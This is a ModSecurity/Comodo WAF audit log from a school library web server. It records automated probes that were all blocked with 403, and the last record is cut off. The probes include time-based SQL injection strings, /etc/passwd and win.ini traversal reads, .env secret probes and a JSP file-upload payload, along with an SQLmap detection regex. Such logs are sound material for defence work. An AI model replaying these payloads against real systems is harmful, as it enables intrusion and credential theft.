Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3144b1b-Z-- --5bc1656e-A-- [22/May/2025:06:31:43 +0700] aC5iX2friXjg62qQwE_kWwAAAIE 103.236.140.4 58426 103.236.140.4 8181 --5bc1656e-B-- GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:6'-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 163513649 --5bc1656e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5bc1656e-E-- --5bc1656e-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:6'--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747870303893793 4018 (- - -) Stopwatch2: 1747870303893793 4018; combined=2002, p1=606, p2=1351, p3=0, p4=0, p5=45, sr=164, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5bc1656e-Z-- --aecf4e01-A-- [22/May/2025:06:31:43 +0700] aC5iX2friXjg62qQwE_kXAAAAIQ 103.236.140.4 58426 103.236.140.4 8181 --aecf4e01-B-- GET /xx?pageId=login&classid=1'waitfor+delay+'0:0:3'-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 168342231 --aecf4e01-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --aecf4e01-E-- --aecf4e01-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /xx?pageId=login&classid=1'waitfor+delay+'0:0:3'--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747870303898586 2182 (- - -) Stopwatch2: 1747870303898586 2182; combined=1233, p1=323, p2=882, p3=0, p4=0, p5=28, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --aecf4e01-Z-- --ffdc452d-A-- [22/May/2025:06:31:44 +0700] aC5iYGfriXjg62qQwE_kXgAAAIY 103.236.140.4 58448 103.236.140.4 8181 --ffdc452d-B-- GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:3'-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.6312.58 Safari/537.36 Accept: */* Accept-Language: zh-CN,zh;q=0.9 Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 168342234 --ffdc452d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ffdc452d-E-- --ffdc452d-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:3'--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747870304882214 2868 (- - -) Stopwatch2: 1747870304882214 2868; combined=1338, p1=393, p2=903, p3=0, p4=0, p5=42, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ffdc452d-Z-- --fe97205c-A-- [22/May/2025:06:41:12 +0700] aC5kmCektx75wRFPQyh-FAAAAMQ 103.236.140.4 59214 103.236.140.4 8181 --fe97205c-B-- GET /@fs/C://windows/win.ini?import&?inline=1.wasm?init HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 213.136.68.40 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 213.136.68.40 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 --fe97205c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fe97205c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747870872737229 2507 (- - -) Stopwatch2: 1747870872737229 2507; combined=1214, p1=413, p2=771, p3=0, p4=0, p5=29, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fe97205c-Z-- --e733d123-A-- [22/May/2025:06:41:12 +0700] aC5kmGfriXjg62qQwE_klQAAAIY 103.236.140.4 59216 103.236.140.4 8181 --e733d123-B-- GET /@fs/C://windows/win.ini?raw?? 
HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 213.136.68.40 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 213.136.68.40 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 --e733d123-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e733d123-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747870872741886 1776 (- - -) Stopwatch2: 1747870872741886 1776; combined=814, p1=337, p2=449, p3=0, p4=0, p5=28, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e733d123-Z-- --69887b56-A-- [22/May/2025:06:45:11 +0700] aC5lh30O04WKE1HJ5iT9PQAAAAI 103.236.140.4 59662 103.236.140.4 8181 --69887b56-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; MI 8 Lite) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --69887b56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69887b56-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747871111401970 773 (- - -) Stopwatch2: 1747871111401970 773; combined=333, p1=290, p2=0, p3=0, p4=0, p5=43, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69887b56-Z-- --d63eba0d-A-- [22/May/2025:06:46:23 +0700] aC5lz30O04WKE1HJ5iT9WwAAAAw 103.236.140.4 59746 103.236.140.4 8181 --d63eba0d-B-- GET /attachment?file=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Accept: */* Accept-Language: zh-CN,zh;q=0.9 Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 165481560 --d63eba0d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d63eba0d-E-- --d63eba0d-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /attachment?file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747871183144397 1867 (- - -) Stopwatch2: 1747871183144397 1867; combined=594, p1=438, p2=122, p3=0, p4=0, p5=33, sr=72, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d63eba0d-Z-- --4a8f7026-A-- [22/May/2025:06:51:57 +0700] aC5nHeThJmFSRJ5-OZdYOgAAAEU 103.236.140.4 60290 103.236.140.4 8181 --4a8f7026-B-- POST /UploadFileData?action=upload_file&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&1=1&foldername=%2e%2e%2f&filename=zewmnfgq.jsp&filename=1.jpg HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 250 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: zh-CN,zh;q=0.9 Content-Type: multipart/form-data Upgrade-Insecure-Requests: 1 X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 165481852 --4a8f7026-C-- ------WebKitFormBoundary92pUawKc Content-Disposition: form-data; name="myFile";filename="test.jpg" <% out.println("ybeckexomb");new 
java.io.File(application.getRealPath(request.getServletPath())).delete(); %> ------WebKitFormBoundary92pUawKc-- --4a8f7026-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4a8f7026-H-- Message: Multipart parsing error (init): Multipart: Boundary not found in C-T. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Multipart: Boundary not found in C-T."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Message: Access denied with code 403 (phase 2). Match of "eq 0" against "MULTIPART_STRICT_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "30"] [id "210240"] [rev "4"] [msg "COMODO WAF: Multipart request body failed strict validation: PE 1, BQ 0, BW 0, DB 0, DA 0, HF 0, LF 0, SM , IQ 0, IH 0, FLE 0||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747871517967373 6571 (- - -) Stopwatch2: 1747871517967373 6571; combined=4966, p1=559, p2=4381, p3=0, p4=0, p5=26, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4a8f7026-Z-- --d728650d-A-- [22/May/2025:07:01:26 +0700] aC5pVmfriXjg62qQwE_lBgAAAIU 103.236.140.4 60932 103.236.140.4 8181 --d728650d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G965F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.101 Mobile Safari/537.36 Accept-Charset: utf-8 --d728650d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d728650d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747872086912652 815 (- - -) Stopwatch2: 1747872086912652 815; combined=378, p1=345, p2=0, p3=0, p4=0, p5=32, sr=142, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d728650d-Z-- --a4f08f48-A-- [22/May/2025:07:20:43 +0700] aC5t230O04WKE1HJ5iT-wwAAAAo 103.236.140.4 34034 103.236.140.4 8181 --a4f08f48-B-- GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),4)-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14 Accept-Charset: utf-8 Content-Type: application/x-www-form-urlencoded Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 159417168 --a4f08f48-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a4f08f48-E-- --a4f08f48-H-- Message: Access denied with code 403 (phase 2). Pattern match "[\\[\\]\\x22',()\\.]{10}$|\\b(?:union\\sall\\sselect\\s(?:(?:null|\\d+),?)+|order\\sby\\s\\d{1,4}|(?:and|or)\\s\\d{4}=\\d{4}|waitfor\\sdelay\\s'\\d+:\\d+:\\d+'|(?:select|and|or)\\s(?:(?:pg_)?sleep\\(\\d+\\)|\\d+\\s?=\\s?(?:dbms_pipe\\.receive_message\\ ..." at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "66"] [id "218500"] [rev "18"] [msg "COMODO WAF: SQLmap attack detected||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: and 4563=dbms_pipe.receive_message(chr(65),4)-- found within REQUEST_URI: /portal/pt/erfile/down/bill?pageid=login&id=1' and 4563=dbms_pipe.receive_message(chr(65),4)--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873243396761 2816 (- - -) Stopwatch2: 1747873243396761 2816; combined=1350, p1=495, p2=836, p3=0, p4=0, p5=19, sr=77, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a4f08f48-Z-- --c62c807f-A-- [22/May/2025:07:20:43 +0700] aC5t2-ThJmFSRJ5-OZdYywAAAEY 103.236.140.4 34046 103.236.140.4 8181 --c62c807f-B-- GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:3'-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 160793104 --c62c807f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c62c807f-E-- --c62c807f-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:3'--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873243397217 2481 (- - -) Stopwatch2: 1747873243397217 2481; combined=1199, p1=404, p2=763, p3=0, p4=0, p5=31, sr=74, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c62c807f-Z-- --90210d71-A-- [22/May/2025:07:20:43 +0700] aC5t22friXjg62qQwE_ldQAAAI4 103.236.140.4 34062 103.236.140.4 8181 --90210d71-B-- GET /portal/pt/servlet/workflowImageServlet/doPost?pageId=login&wfpk=1&proInsPk=1'waitfor+delay+'0:0:3'-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Content-Type: application/x-www-form-urlencoded Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 163513655 --90210d71-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --90210d71-E-- --90210d71-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /portal/pt/servlet/workflowImageServlet/doPost?pageId=login&wfpk=1&proInsPk=1'waitfor+delay+'0:0:3'--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873243398200 2590 (- - -) Stopwatch2: 1747873243398200 2590; combined=1442, p1=337, p2=1081, p3=0, p4=0, p5=23, sr=62, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90210d71-Z-- --3b715505-A-- [22/May/2025:07:20:43 +0700] aC5t2-ThJmFSRJ5-OZdYzAAAAEo 103.236.140.4 34048 103.236.140.4 8181 --3b715505-B-- POST /services/userInfoWeb HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 561 User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/128.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: zh-CN,zh;q=0.9 Cache-Control: max-age=0 Content-Type: text/xml;charset=UTF-8 DNT: 1 Origin: null SOAPAction: Upgrade-Insecure-Requests: 1 X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 168567548 --3b715505-C-- ';waitfor delay '0:0:3'-- --3b715505-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b715505-E-- --3b715505-H-- Message: Access denied with code 403 (phase 2). 
Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /services/userInfoWeb"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873243397538 3491 (- - -) Stopwatch2: 1747873243397538 3491; combined=1995, p1=349, p2=1625, p3=0, p4=0, p5=20, sr=68, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b715505-Z-- --f062b81b-A-- [22/May/2025:07:20:43 +0700] aC5t2yektx75wRFPQyh--gAAAMM 103.236.140.4 34050 103.236.140.4 8181 --f062b81b-B-- GET /portal/pt/servlet/workflowImageServlet/doPost?pageId=login&wfpk=1&proInsPk=1'waitfor+delay+'0:0:6'-- HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (ZZ; Linux x86_64; rv:131.0) Gecko/20100101 Firefox/131.0 Cookie: X-Forwarded-For: 45.32.66.146 Accept-Encoding: gzip X-Varnish: 168436652 --f062b81b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f062b81b-E-- --f062b81b-H-- Message: Access denied with code 403 (phase 2). Match of "contains /wp-json/yoast/" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "17"] [id "211540"] [rev "14"] [msg "COMODO WAF: Blind SQL Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: waitfor delay found within REQUEST_URI: /portal/pt/servlet/workflowImageServlet/doPost?pageId=login&wfpk=1&proInsPk=1'waitfor+delay+'0:0:6'--"] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747873243397531 3729 (- - -) Stopwatch2: 1747873243397531 3729; combined=1957, p1=550, p2=1377, p3=0, p4=0, p5=29, sr=145, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f062b81b-Z-- --e744cc17-A-- [22/May/2025:07:20:43 +0700] aC5t2yektx75wRFPQyh--wAAAMc 103.236.140.4 34058 103.236.140.4 8181 --e744cc17-B-- GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iuforeport.rep.FormulaViewAction&method=execute&repID=1')%20WAITFOR%20DELAY%20'0:0:3'--+&unitID=public HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; 